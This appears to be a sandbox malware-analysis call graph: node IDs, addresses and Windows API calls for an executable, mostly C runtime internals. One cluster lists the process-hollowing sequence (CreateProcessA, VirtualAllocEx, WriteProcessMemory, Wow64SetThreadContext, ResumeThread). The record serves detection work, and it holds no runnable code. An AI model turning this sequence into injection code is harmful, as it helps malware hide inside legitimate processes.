14269->14270 14279 4f49f4 14269->14279 14275 4f4943 14270->14275 14270->14279 14272 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14274 4f4aad 14272->14274 14274->14211 14280 4f28d8 14275->14280 14278 4f2bcf 46 API calls 14278->14279 14279->14272 14281 4eb0eb __strnicoll 41 API calls 14280->14281 14282 4f28f8 14281->14282 14300 4f3b78 14282->14300 14284 4f2925 14285 4f29bc 14284->14285 14286 4f29b4 14284->14286 14289 4f1dc1 __fread_nolock 15 API calls 14284->14289 14291 4f294a __fread_nolock __alloca_probe_16 14284->14291 14287 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14285->14287 14303 4e4466 14286->14303 14290 4f29df 14287->14290 14289->14291 14295 4f2bcf 14290->14295 14291->14286 14292 4f3b78 __strnicoll MultiByteToWideChar 14291->14292 14293 4f2995 14292->14293 14293->14286 14294 4f29a0 GetStringTypeW 14293->14294 14294->14286 14296 4eb0eb __strnicoll 41 API calls 14295->14296 14297 4f2be2 14296->14297 14310 4f29e1 14297->14310 14301 4f3b89 MultiByteToWideChar 14300->14301 14301->14284 14304 4e4470 14303->14304 14306 4e4481 14303->14306 14304->14306 14307 4ea61a 14304->14307 14306->14285 14308 4eed98 ___free_lconv_mon 14 API calls 14307->14308 14309 4ea632 14308->14309 14309->14306 14311 4f29fc ctype 14310->14311 14312 4f3b78 __strnicoll MultiByteToWideChar 14311->14312 14315 4f2a42 14312->14315 14313 4f2bba 14314 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14313->14314 14316 4f2bcd 14314->14316 14315->14313 14317 4f1dc1 __fread_nolock 15 API calls 14315->14317 14319 4f2a68 __alloca_probe_16 14315->14319 14326 4f2aee 14315->14326 14316->14278 14317->14319 14318 4e4466 __freea 14 API calls 14318->14313 14320 4f3b78 __strnicoll MultiByteToWideChar 14319->14320 14319->14326 14321 4f2aad 14320->14321 14321->14326 14338 4ef442 14321->14338 14324 4f2adf 14324->14326 14330 4ef442 std::_Locinfo::_Locinfo_dtor 7 API calls 14324->14330 14325 4f2b17 14327 4f2ba2 14325->14327 14328 4f1dc1 __fread_nolock 15 API calls 14325->14328 14331 4f2b29 __alloca_probe_16 14325->14331 14326->14318 14329 4e4466 __freea 14 API calls 14327->14329 14328->14331 14329->14326 14330->14326 14331->14327 14332 4ef442 std::_Locinfo::_Locinfo_dtor 7 API calls 14331->14332 14333 4f2b6c 14332->14333 14333->14327 14347 4f3bf4 14333->14347 14335 4f2b86 14335->14327 14336 4f2b8f 14335->14336 14337 4e4466 __freea 14 API calls 14336->14337 14337->14326 14339 4eef74 std::_Locinfo::_Locinfo_dtor 5 API calls 14338->14339 14340 4ef44d 14339->14340 14341 4ef47a 14340->14341 14342 4ef453 LCMapStringEx 14340->14342 14343 4ef49f __strnicoll 5 API calls 14341->14343 14346 4ef49a 14342->14346 14345 4ef493 LCMapStringW 14343->14345 14345->14346 14346->14324 14346->14325 14346->14326 14349 4f3c0b WideCharToMultiByte 14347->14349 14349->14335 14350->14217 14361 4e9bdd 14351->14361 14353 4f4790 14354 4e9bdd __fread_nolock 41 API calls 14353->14354 14355 4f47af 14354->14355 14356 4f4744 14355->14356 14357 4eed98 ___free_lconv_mon 14 API calls 14355->14357 14358 4f4762 14356->14358 14357->14356 14375 4ea6be LeaveCriticalSection 14358->14375 14360 4f4750 14360->13867 14362 4e9bee 14361->14362 14371 4e9bea ctype 14361->14371 14363 4e9c08 __fread_nolock 14362->14363 14364 4e9bf5 14362->14364 14368 4e9c3f 14363->14368 14369 4e9c36 14363->14369 14363->14371 14365 4eb0d8 __dosmaperr 14 API calls 14364->14365 14366 4e9bfa 14365->14366 14367 4e8ecf __strnicoll 41 API calls 14366->14367 14367->14371 14368->14371 14373 4eb0d8 __dosmaperr 14 API calls 14368->14373 14370 4eb0d8 __dosmaperr 14 API calls 14369->14370 14372 4e9c3b 14370->14372 14371->14353 14374 4e8ecf __strnicoll 41 API calls 14372->14374 14373->14372 14374->14371 14375->14360 14377 4edfc4 14376->14377 14378 4edfd2 14376->14378 14377->14378 14383 4edfea 14377->14383 14379 4eb0d8 __dosmaperr 14 API calls 14378->14379 14380 4edfda 14379->14380 14381 4e8ecf __strnicoll 41 API calls 14380->14381 14382 4edfe4 14381->14382 14382->13813 14383->14382 14384 4eb0d8 __dosmaperr 14 API calls 14383->14384 14384->14380 14389 4ebd37 14385->14389 14390 4ebd08 14385->14390 14386 4ebd4e 14388 4eed98 ___free_lconv_mon 14 API calls 14386->14388 14387 4eed98 ___free_lconv_mon 14 API calls 14387->14389 14388->14390 14389->14386 14389->14387 14390->13814 14392 4e8f08 14391->14392 14393 4e8cd3 __FrameHandler3::FrameUnwindToState 8 API calls 14392->14393 14394 4e8f1d GetCurrentProcess TerminateProcess 14393->14394 14394->13820 14397 4e10dc __EH_prolog3_catch _strlen 14395->14397 14424 4e185d 14397->14424 14398 4e1135 14428 4e1c9d 14398->14428 14402 4e126d ctype 14402->13624 14404 4e165b _strlen 14403->14404 14584 4e12de 14404->14584 14406 4e1668 14406->13626 14408 4e1c84 14407->14408 14410 4e1c5a std::ios_base::_Init 14407->14410 14591 4e1532 14408->14591 14410->13628 14611 4fc151 14411->14611 14413 4fc21f ctype 14617 4fc137 14413->14617 14417 4e1bf5 14416->14417 14418 4e1bfe 14416->14418 14419 4e13d9 _Deallocate 41 API calls 14417->14419 14418->13635 14420 4e8e1b _Deallocate 41 API calls 14418->14420 14419->14418 14421 4e8eee 14420->14421 14422 4e8efc __Getctype 11 API calls 14421->14422 14423 4e8efb 14422->14423 14426 4e186c 14424->14426 14425 4e188a 14425->14398 14426->14425 14440 4e1d88 14426->14440 14429 4e1265 14428->14429 14431 4e1cb4 std::ios_base::_Init 14428->14431 14435 4e1937 14429->14435 14430 4e1ced 14451 4e5842 14430->14451 14431->14430 14448 4e1803 14431->14448 14433 4e1d06 14566 4e1fd5 14435->14566 14437 4e193f 14438 4e1911 14437->14438 14570 4e1b4d 14437->14570 14438->14402 14441 4e1d94 __EH_prolog3_catch 14440->14441 14442 4e1e39 ctype 14441->14442 14443 4e185d 51 API calls 14441->14443 14442->14425 14446 4e1db3 14443->14446 14444 4e1e31 14445 4e1937 51 API calls 14444->14445 14445->14442 14446->14444 14447 4e1c9d std::ios_base::_Init 43 API calls 14446->14447 14447->14444 14454 4e18bd 14448->14454 14452 4e5889 RaiseException 14451->14452 14453 4e585c 14451->14453 14452->14433 14453->14452 14455 4e163e std::ios_base::_Init 43 API calls 14454->14455 14456 4e18dc 14455->14456 14463 4e16b8 14456->14463 14459 4e1bea std::ios_base::_Init 41 API calls 14460 4e18f5 14459->14460 14461 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14460->14461 14462 4e1818 14461->14462 14462->14430 14474 4e160a 14463->14474 14470 4e1bea std::ios_base::_Init 41 API calls 14471 4e16fb 14470->14471 14472 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14471->14472 14473 4e171a 14472->14473 14473->14459 14475 4e162a 14474->14475 14494 4e134f 14475->14494 14477 4e1637 14478 4e1acb 14477->14478 14479 4e1afc 14478->14479 14480 4e1ae5 _strlen 14478->14480 14481 4e1c44 std::ios_base::_Init 43 API calls 14479->14481 14482 4e1c44 std::ios_base::_Init 43 API calls 14480->14482 14483 4e1b23 14481->14483 14482->14479 14484 4e1bea std::ios_base::_Init 41 API calls 14483->14484 14485 4e1b2b std::ios_base::_Init 14484->14485 14486 4e1bea std::ios_base::_Init 41 API calls 14485->14486 14487 4e1b3e 14486->14487 14488 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14487->14488 14489 4e16e8 14488->14489 14490 4e183c 14489->14490 14491 4e1849 14490->14491 14548 4e17b6 14491->14548 14495 4e13b1 14494->14495 14498 4e1360 std::ios_base::_Init 14494->14498 14509 4e1c10 14495->14509 14500 4e1367 std::ios_base::_Init ctype 14498->14500 14501 4e127a 14498->14501 14500->14477 14502 4e128d 14501->14502 14503 4e1285 14501->14503 14505 4e1299 14502->14505 14525 4e46d5 14502->14525 14512 4e129c 14503->14512 14505->14500 14506 4e128b 14506->14500 14508 4e1297 14508->14500 14543 4e1f95 14509->14543 14513 4e12ab 14512->14513 14515 4e1bcd Concurrency::cancel_current_task 14512->14515 14514 4e46d5 ctype 43 API calls 14513->14514 14521 4e12b1 14514->14521 14517 4e5842 Concurrency::cancel_current_task RaiseException 14515->14517 14516 4e12b8 14516->14506 14518 4e1be9 14517->14518 14518->14521 14523 4e13d9 _Deallocate 41 API calls 14518->14523 14519 4e8e1b _Deallocate 41 API calls 14520 4e8eee 14519->14520 14522 4e8efc __Getctype 11 API calls 14520->14522 14521->14506 14521->14516 14521->14519 14524 4e8efb 14522->14524 14523->14521 14527 4e46da 14525->14527 14526 4ea6ec _Yarn 15 API calls 14526->14527 14527->14526 14528 4e46f4 14527->14528 14529 4eda13 ctype EnterCriticalSection LeaveCriticalSection 14527->14529 14530 4e46f6 14527->14530 14528->14508 14529->14527 14531 4e1bcd Concurrency::cancel_current_task 14530->14531 14532 4e4700 ctype 14530->14532 14533 4e5842 Concurrency::cancel_current_task RaiseException 14531->14533 14535 4e5842 Concurrency::cancel_current_task RaiseException 14532->14535 14534 4e1be9 14533->14534 14537 4e1bfe 14534->14537 14538 4e13d9 _Deallocate 41 API calls 14534->14538 14536 4e4ff1 14535->14536 14537->14508 14539 4e8e1b _Deallocate 41 API calls 14537->14539 14538->14537 14540 4e8eee 14539->14540 14541 4e8efc __Getctype 11 API calls 14540->14541 14542 4e8efb 14541->14542 14544 4e1f0f std::invalid_argument::invalid_argument 42 API calls 14543->14544 14545 4e1fa6 14544->14545 14546 4e5842 Concurrency::cancel_current_task RaiseException 14545->14546 14547 4e1fb4 14546->14547 14551 4e57c0 14548->14551 14552 4e57cd 14551->14552 14558 4e16f3 14551->14558 14552->14558 14559 4ea6ec 14552->14559 14555 4e57fa 14556 4ea61a __freea 14 API calls 14555->14556 14556->14558 14557 4edfb6 ___std_exception_copy 41 API calls 14557->14555 14558->14470 14564 4f1dc1 __dosmaperr 14559->14564 14560 4f1dff 14561 4eb0d8 __dosmaperr 14 API calls 14560->14561 14563 4e57ea 14561->14563 14562 4f1dea HeapAlloc 14562->14563 14562->14564 14563->14555 14563->14557 14564->14560 14564->14562 14565 4eda13 ctype EnterCriticalSection LeaveCriticalSection 14564->14565 14565->14564 14566->14437 14567 4e5c5d 14566->14567 14574 4e790c 14567->14574 14569 4e5c62 14569->14437 14571 4e1b59 __EH_prolog3_catch 14570->14571 14572 4e1b95 ctype 14571->14572 14573 4e1c9d std::ios_base::_Init 43 API calls 14571->14573 14572->14438 14573->14572 14575 4e7918 GetLastError 14574->14575 14576 4e7915 14574->14576 14579 4e8a83 14575->14579 14576->14569 14580 4e8922 ___vcrt_FlsGetValue 5 API calls 14579->14580 14581 4e8a9d 14580->14581 14582 4e8ab5 TlsGetValue 14581->14582 14583 4e792d SetLastError 14581->14583 14582->14583 14583->14569 14585 4e1349 14584->14585 14588 4e12ef std::ios_base::_Init 14584->14588 14586 4e1c10 std::ios_base::_Init 43 API calls 14585->14586 14587 4e134e 14586->14587 14589 4e127a std::ios_base::_Init 43 API calls 14588->14589 14590 4e12f6 std::ios_base::_Init 14588->14590 14589->14590 14590->14406 14592 4e15bb 14591->14592 14593 4e154b std::ios_base::_Init 14591->14593 14594 4e1c10 std::ios_base::_Init 43 API calls 14592->14594 14596 4e127a std::ios_base::_Init 43 API calls 14593->14596 14595 4e15c0 14594->14595 14597 4e156a std::ios_base::_Init 14596->14597 14599 4e15a0 std::ios_base::_Init 14597->14599 14600 4e13d9 14597->14600 14599->14410 14601 4e13e6 14600->14601 14603 4e13f3 error_info_injector 14600->14603 14604 4e1a16 14601->14604 14603->14599 14605 4e1a30 14604->14605 14606 4e1a33 14604->14606 14605->14603 14607 4e8e1b _Deallocate 41 API calls 14606->14607 14608 4e8eee 14607->14608 14609 4e8efc __Getctype 11 API calls 14608->14609 14610 4e8efb 14609->14610 14612 4fc1dd 14611->14612 14613 4fc175 14611->14613 14614 4fc1f1 14612->14614 14615 4e13d9 _Deallocate 41 API calls 14612->14615 14613->14612 14620 4e1405 14613->14620 14614->14413 14615->14614 14654 4fc000 14617->14654 14621 4e1411 __EH_prolog3_catch 14620->14621 14622 4e14bd 14621->14622 14623 4e1431 14621->14623 14641 4e1c1b 14622->14641 14630 4e1c26 14623->14630 14627 4e1446 14637 4e1a93 14627->14637 14629 4e149c ctype 14629->14613 14631 4e1c3e 14630->14631 14632 4e1c31 14630->14632 14644 4e1bcd 14631->14644 14634 4e127a std::ios_base::_Init 43 API calls 14632->14634 14635 4e1c3a 14634->14635 14635->14627 14636 4e1c43 14638 4e1aab 14637->14638 14639 4e1a9b 14637->14639 14638->14629 14640 4e13d9 _Deallocate 41 API calls 14639->14640 14640->14638 14642 4e1f95 std::_Xinvalid_argument 43 API calls 14641->14642 14643 4e1c25 14642->14643 14645 4e1bdb Concurrency::cancel_current_task 14644->14645 14646 4e5842 Concurrency::cancel_current_task RaiseException 14645->14646 14647 4e1be9 14646->14647 14648 4e1bfe 14647->14648 14649 4e13d9 _Deallocate 41 API calls 14647->14649 14648->14636 14650 4e8e1b _Deallocate 41 API calls 14648->14650 14649->14648 14651 4e8eee 14650->14651 14652 4e8efc __Getctype 11 API calls 14651->14652 14653 4e8efb 14652->14653 14663 4e12c7 14654->14663 14656 4fc037 14657 4fc112 14656->14657 14660 4e10d0 51 API calls 14656->14660 14666 4e14c8 14657->14666 14659 4fc11e 14661 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14659->14661 14660->14656 14662 4fc130 CreateThread WaitForSingleObjectEx CloseHandle 14661->14662 14662->13633 14664 4e46d5 ctype 43 API calls 14663->14664 14665 4e12ce 14664->14665 14665->14656 14669 4e14e8 14666->14669 14668 4e14d9 error_info_injector 14668->14659 14670 4e14f2 14669->14670 14671 4e1514 14670->14671 14672 4e14e8 41 API calls 14670->14672 14674 4e1519 14670->14674 14671->14668 14672->14670 14675 4e1bea std::ios_base::_Init 41 API calls 14674->14675 14676 4e1526 error_info_injector 14675->14676 14676->14670 14678 4ec03f 14677->14678 14679 4ec051 14677->14679 14704 4ec0da GetModuleHandleW 14678->14704 14689 4ebeda 14679->14689 14684 4e46c2 14684->13663 14688 4ec0a3 14690 4ebee6 __FrameHandler3::FrameUnwindToState 14689->14690 14712 4ea676 EnterCriticalSection 14690->14712 14692 4ebef0 14713 4ebf27 14692->14713 14694 4ebefd 14717 4ebf1b 14694->14717 14697 4ec0a9 14742 4ec11d 14697->14742 14700 4ec0c7 14702 4ec13f __FrameHandler3::FrameUnwindToState 3 API calls 14700->14702 14701 4ec0b7 GetCurrentProcess TerminateProcess 14701->14700 14703 4ec0cf ExitProcess 14702->14703 14705 4ec044 14704->14705 14705->14679 14706 4ec13f GetModuleHandleExW 14705->14706 14707 4ec17e GetProcAddress 14706->14707 14708 4ec19f 14706->14708 14707->14708 14709 4ec192 14707->14709 14710 4ec050 14708->14710 14711 4ec1a5 FreeLibrary 14708->14711 14709->14708 14710->14679 14711->14710 14712->14692 14714 4ebf33 __FrameHandler3::FrameUnwindToState 14713->14714 14715 4ebf9a __FrameHandler3::FrameUnwindToState 14714->14715 14720 4edd44 14714->14720 14715->14694 14741 4ea6be LeaveCriticalSection 14717->14741 14719 4ebf09 14719->14684 14719->14697 14721 4edd50 __EH_prolog3 14720->14721 14724 4eda9c 14721->14724 14723 4edd77 ctype 14723->14715 14725 4edaa8 __FrameHandler3::FrameUnwindToState 14724->14725 14732 4ea676 EnterCriticalSection 14725->14732 14727 4edab6 14733 4edc54 14727->14733 14732->14727 14734 4edac3 14733->14734 14735 4edc73 14733->14735 14737 4edaeb 14734->14737 14735->14734 14736 4eed98 ___free_lconv_mon 14 API calls 14735->14736 14736->14734 14740 4ea6be LeaveCriticalSection 14737->14740 14739 4edad4 14739->14723 14740->14739 14741->14719 14747 4f53ce GetPEB 14742->14747 14745 4ec127 GetPEB 14746 4ec0b3 14745->14746 14746->14700 14746->14701 14748 4f53e8 14747->14748 14749 4ec122 14747->14749 14751 4ef0f6 14748->14751 14749->14745 14749->14746 14752 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 14751->14752 14753 4ef112 14752->14753 14753->14749 14755 4edf08 ___scrt_uninitialize_crt 14754->14755 14756 4edef6 14754->14756 14755->13657 14757 4edf04 14756->14757 14759 4e95ae 14756->14759 14757->13657 14762 4e943b 14759->14762 14765 4e932f 14762->14765 14766 4e933b __FrameHandler3::FrameUnwindToState 14765->14766 14773 4ea676 EnterCriticalSection 14766->14773 14768 4e9345 ___scrt_uninitialize_crt 14769 4e93b1 14768->14769 14774 4e92a3 14768->14774 14782 4e93cf 14769->14782 14773->14768 14775 4e92af __FrameHandler3::FrameUnwindToState 14774->14775 14785 4e9126 EnterCriticalSection 14775->14785 14777 4e92f2 14799 4e9323 14777->14799 14778 4e92b9 ___scrt_uninitialize_crt 14778->14777 14786 4e9549 14778->14786 14901 4ea6be LeaveCriticalSection 14782->14901 14784 4e93bd 14784->14757 14785->14778 14787 4e955e _Fputc 14786->14787 14788 4e9565 14787->14788 14789 4e9570 14787->14789 14790 4e943b ___scrt_uninitialize_crt 70 API calls 14788->14790 14802 4e94e0 14789->14802 14792 4e956b 14790->14792 14794 4e8c0b _Fputc 41 API calls 14792->14794 14795 4e95a8 14794->14795 14795->14777 14797 4e9591 14815 4efb11 14797->14815 14900 4e913a LeaveCriticalSection 14799->14900 14801 4e9311 14801->14768 14803 4e94f9 14802->14803 14804 4e9520 14802->14804 14803->14804 14805 4ef839 __fread_nolock 41 API calls 14803->14805 14804->14792 14808 4ef839 14804->14808 14806 4e9515 14805->14806 14826 4f033c 14806->14826 14809 4ef85a 14808->14809 14810 4ef845 14808->14810 14809->14797 14811 4eb0d8 __dosmaperr 14 API calls 14810->14811 14812 4ef84a 14811->14812 14813 4e8ecf __strnicoll 41 API calls 14812->14813 14814 4ef855 14813->14814 14814->14797 14816 4efb2f 14815->14816 14817 4efb22 14815->14817 14819 4efb78 14816->14819 14822 4efb56 14816->14822 14818 4eb0d8 __dosmaperr 14 API calls 14817->14818 14825 4efb27 14818->14825 14820 4eb0d8 __dosmaperr 14 API calls 14819->14820 14821 4efb7d 14820->14821 14823 4e8ecf __strnicoll 41 API calls 14821->14823 14867 4efa6f 14822->14867 14823->14825 14825->14792 14828 4f0348 __FrameHandler3::FrameUnwindToState 14826->14828 14827 4f040c 14829 4e8e52 _Fputc 29 API calls 14827->14829 14828->14827 14830 4f039d 14828->14830 14836 4f0350 14828->14836 14829->14836 14837 4f554d EnterCriticalSection 14830->14837 14832 4f03a3 14833 4f03c0 14832->14833 14838 4f0444 14832->14838 14864 4f0404 14833->14864 14836->14804 14837->14832 14839 4f0469 14838->14839 14862 4f048c __fread_nolock 14838->14862 14840 4f046d 14839->14840 14842 4f04cb 14839->14842 14841 4e8e52 _Fputc 29 API calls 14840->14841 14841->14862 14843 4f04e2 14842->14843 14844 4f1c22 ___scrt_uninitialize_crt 43 API calls 14842->14844 14845 4effc8 ___scrt_uninitialize_crt 42 API calls 14843->14845 14844->14843 14846 4f04ec 14845->14846 14847 4f0532 14846->14847 14848 4f04f2 14846->14848 14849 4f0546 14847->14849 14850 4f0595 WriteFile 14847->14850 14851 4f051c 14848->14851 14852 4f04f9 14848->14852 14853 4f054e 14849->14853 14854 4f0583 14849->14854 14855 4f05b7 GetLastError 14850->14855 14850->14862 14856 4efb8e ___scrt_uninitialize_crt 47 API calls 14851->14856 14859 4eff60 ___scrt_uninitialize_crt 6 API calls 14852->14859 14852->14862 14857 4f0553 14853->14857 14858 4f0571 14853->14858 14860 4f0046 ___scrt_uninitialize_crt 7 API calls 14854->14860 14855->14862 14856->14862 14857->14862 14863 4f0121 ___scrt_uninitialize_crt 7 API calls 14857->14863 14861 4f020a ___scrt_uninitialize_crt 8 API calls 14858->14861 14859->14862 14860->14862 14861->14862 14862->14833 14863->14862 14865 4f5570 ___scrt_uninitialize_crt LeaveCriticalSection 14864->14865 14866 4f040a 14865->14866 14866->14836 14868 4efa7b __FrameHandler3::FrameUnwindToState 14867->14868 14880 4f554d EnterCriticalSection 14868->14880 14870 4efa8a 14878 4efacf 14870->14878 14881 4f5624 14870->14881 14872 4eb0d8 __dosmaperr 14 API calls 14874 4efad6 14872->14874 14873 4efab6 FlushFileBuffers 14873->14874 14875 4efac2 GetLastError 14873->14875 14897 4efb05 14874->14897 14894 4eb0c5 14875->14894 14878->14872 14880->14870 14882 4f5631 14881->14882 14884 4f5646 14881->14884 14883 4eb0c5 __dosmaperr 14 API calls 14882->14883 14886 4f5636 14883->14886 14885 4eb0c5 __dosmaperr 14 API calls 14884->14885 14889 4f566b 14884->14889 14887 4f5676 14885->14887 14888 4eb0d8 __dosmaperr 14 API calls 14886->14888 14890 4eb0d8 __dosmaperr 14 API calls 14887->14890 14891 4f563e 14888->14891 14889->14873 14892 4f567e 14890->14892 14891->14873 14893 4e8ecf __strnicoll 41 API calls 14892->14893 14893->14891 14895 4eeba1 __dosmaperr 14 API calls 14894->14895 14896 4eb0ca 14895->14896 14896->14878 14898 4f5570 ___scrt_uninitialize_crt LeaveCriticalSection 14897->14898 14899 4efaee 14898->14899 14899->14825 14900->14801 14901->14784 15591 4e1068 15596 4e39bf 15591->15596 15598 4e39cf 15596->15598 15599 4e106d 15596->15599 15598->15599 15603 4e424a InitializeCriticalSectionEx 15598->15603 15600 4e4a47 15599->15600 15604 4e4a1a 15600->15604 15603->15598 15605 4e4a29 15604->15605 15606 4e4a30 15604->15606 15610 4edd2e 15605->15610 15613 4eddab 15606->15613 15609 4e1077 15611 4eddab 44 API calls 15610->15611 15612 4edd40 15611->15612 15612->15609 15616 4edaf7 15613->15616 15617 4edb03 __FrameHandler3::FrameUnwindToState 15616->15617 15624 4ea676 EnterCriticalSection 15617->15624 15619 4edb11 15625 4edb52 15619->15625 15621 4edb1e 15635 4edb46 15621->15635 15624->15619 15626 4edb6d 15625->15626 15631 4edbe0 std::_Locinfo::_Locinfo_dtor 15625->15631 15627 4edbc0 15626->15627 15628 4f7960 44 API calls 15626->15628 15626->15631 15629 4f7960 44 API calls 15627->15629 15627->15631 15632 4edbb6 15628->15632 15630 4edbd6 15629->15630 15633 4eed98 ___free_lconv_mon 14 API calls 15630->15633 15631->15621 15634 4eed98 ___free_lconv_mon 14 API calls 15632->15634 15633->15631 15634->15627 15638 4ea6be LeaveCriticalSection 15635->15638 15637 4edb2f 15637->15609 15638->15637 15639 4ec668 15642 4ec334 15639->15642 15643 4ec340 __FrameHandler3::FrameUnwindToState 15642->15643 15650 4ea676 EnterCriticalSection 15643->15650 15645 4ec378 15651 4ec396 15645->15651 15647 4ec34a 15647->15645 15649 4f66bb __Getctype 14 API calls 15647->15649 15649->15647 15650->15647 15654 4ea6be LeaveCriticalSection 15651->15654 15653 4ec384 15654->15653 14902 c4018d 14906 c401c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 14902->14906 14904 c403a2 WriteProcessMemory 14905 c403e7 14904->14905 14907 c403ec WriteProcessMemory 14905->14907 14908 c40429 WriteProcessMemory Wow64SetThreadContext ResumeThread 14905->14908 14906->14904 14907->14905 15753 4e1000 15758 4e2242 15753->15758 15755 4e1013 15756 4e4a47 44 API calls 15755->15756 15757 4e101d 15756->15757 15760 4e224e __EH_prolog3 15758->15760 15762 4e2f6c 15760->15762 15761 4e22a0 ctype 15761->15755 15771 4e2c10 15762->15771 15764 4e2f77 15779 4e35c9 15764->15779 15766 4e2f8a 15767 4e2fa3 15766->15767 15768 4e1c9d std::ios_base::_Init 43 API calls 15766->15768 15769 4e2faf 15767->15769 15783 4e4065 15767->15783 15768->15767 15769->15761 15772 4e2c1c __EH_prolog3 15771->15772 15773 4e1c9d std::ios_base::_Init 43 API calls 15772->15773 15774 4e2c4d 15773->15774 15775 4e46d5 ctype 43 API calls 15774->15775 15776 4e2c54 15775->15776 15778 4e2c65 ctype 15776->15778 15788 4e3bcf 15776->15788 15778->15764 15780 4e35d5 __EH_prolog3 15779->15780 15898 4e2188 15780->15898 15782 4e35ed std::ios_base::_Ios_base_dtor ctype 15782->15766 15784 4e39ec std::_Lockit::_Lockit 7 API calls 15783->15784 15785 4e4075 15784->15785 15786 4e3a44 std::_Lockit::~_Lockit 2 API calls 15785->15786 15787 4e40b3 15786->15787 15787->15769 15789 4e3bdb __EH_prolog3 15788->15789 15800 4e39ec 15789->15800 15794 4e3bf9 15812 4e3d55 15794->15812 15796 4e3c54 ctype 15796->15778 15799 4e3c17 15822 4e3a44 15799->15822 15801 4e39fb 15800->15801 15802 4e3a02 15800->15802 15829 4ea6d5 15801->15829 15805 4e3a00 15802->15805 15834 4e425f EnterCriticalSection 15802->15834 15805->15799 15806 4e3d32 15805->15806 15807 4e46d5 ctype 43 API calls 15806->15807 15808 4e3d3d 15807->15808 15809 4e3d51 15808->15809 15880 4e3a63 15808->15880 15809->15794 15813 4e3c01 15812->15813 15814 4e3d61 15812->15814 15816 4e3b27 15813->15816 15883 4e420d 15814->15883 15817 4e3b35 15816->15817 15821 4e3b60 ctype 15816->15821 15818 4ea61a __freea 14 API calls 15817->15818 15819 4e3b41 15817->15819 15818->15819 15820 4ea6ec _Yarn 15 API calls 15819->15820 15819->15821 15820->15821 15821->15799 15823 4e3a4e 15822->15823 15824 4ea6e3 15822->15824 15825 4e3a61 15823->15825 15896 4e426d LeaveCriticalSection 15823->15896 15897 4ea6be LeaveCriticalSection 15824->15897 15825->15796 15828 4ea6ea 15828->15796 15835 4ef4db 15829->15835 15834->15805 15836 4eee8a std::_Locinfo::_Locinfo_dtor 5 API calls 15835->15836 15837 4ef4e0 15836->15837 15838 4eeea4 std::_Locinfo::_Locinfo_dtor 5 API calls 15837->15838 15839 4ef4e5 15838->15839 15856 4eeebe 15839->15856 15855 4ef50d 15855->15855 15857 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15856->15857 15858 4eeed4 15857->15858 15859 4eeed8 15858->15859 15860 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15859->15860 15861 4eeeee 15860->15861 15862 4eeef2 15861->15862 15863 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15862->15863 15864 4eef08 15863->15864 15865 4eef0c 15864->15865 15866 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15865->15866 15867 4eef22 15866->15867 15868 4eef26 15867->15868 15869 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15868->15869 15870 4eef3c 15869->15870 15871 4eef40 15870->15871 15872 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15871->15872 15873 4eef56 15872->15873 15874 4eef74 15873->15874 15875 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15874->15875 15876 4eef8a 15875->15876 15877 4eef5a 15876->15877 15878 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 15877->15878 15879 4eef70 15878->15879 15879->15855 15881 4e3b27 _Yarn 15 API calls 15880->15881 15882 4e3a9d 15881->15882 15882->15794 15884 4e421d EncodePointer 15883->15884 15885 4eaff7 15883->15885 15884->15813 15884->15885 15886 4f2d4a __FrameHandler3::FrameUnwindToState 2 API calls 15885->15886 15888 4eaffc 15886->15888 15887 4eb007 15890 4eb030 15887->15890 15891 4eb011 IsProcessorFeaturePresent 15887->15891 15888->15887 15889 4f2d8f __FrameHandler3::FrameUnwindToState 41 API calls 15888->15889 15889->15887 15892 4ec1ee __FrameHandler3::FrameUnwindToState 23 API calls 15890->15892 15893 4eb01d 15891->15893 15895 4eb03a 15892->15895 15894 4e8cd3 __FrameHandler3::FrameUnwindToState 8 API calls 15893->15894 15894->15890 15896->15825 15897->15828 15899 4e2194 __EH_prolog3 15898->15899 15900 4e39ec std::_Lockit::_Lockit 7 API calls 15899->15900 15901 4e219e 15900->15901 15914 4e2653 15901->15914 15903 4e21b5 15913 4e21c8 15903->15913 15920 4e2aaa 15903->15920 15904 4e3a44 std::_Lockit::~_Lockit 2 API calls 15906 4e220f ctype 15904->15906 15906->15782 15907 4e21d8 15908 4e21df 15907->15908 15909 4e2217 15907->15909 15930 4e3b9d 15908->15930 15933 4e2d5a 15909->15933 15913->15904 15915 4e265f 15914->15915 15916 4e2683 15914->15916 15917 4e39ec std::_Lockit::_Lockit 7 API calls 15915->15917 15916->15903 15918 4e2669 15917->15918 15919 4e3a44 std::_Lockit::~_Lockit 2 API calls 15918->15919 15919->15916 15922 4e2ab6 __EH_prolog3 15920->15922 15921 4e2b07 ctype 15921->15907 15922->15921 15923 4e46d5 ctype 43 API calls 15922->15923 15924 4e2acf ctype 15923->15924 15925 4e2af6 15924->15925 15937 4e2391 15924->15937 15925->15921 15952 4e256d 15925->15952 15928 4e2aeb 15949 4e231b 15928->15949 15931 4e46d5 ctype 43 API calls 15930->15931 15932 4e3ba8 15931->15932 15932->15913 15934 4e2d68 Concurrency::cancel_current_task 15933->15934 15935 4e5842 Concurrency::cancel_current_task RaiseException 15934->15935 15936 4e2d76 15935->15936 15938 4e239d __EH_prolog3 15937->15938 15939 4e39ec std::_Lockit::_Lockit 7 API calls 15938->15939 15940 4e23aa 15939->15940 15941 4e23de 15940->15941 15942 4e23f3 15940->15942 15969 4e3ccd 15941->15969 15978 4e1fb5 15942->15978 15945 4e23e7 ctype 15945->15928 16025 4e3de2 15949->16025 16070 4e3d18 15952->16070 15955 4e25a8 15957 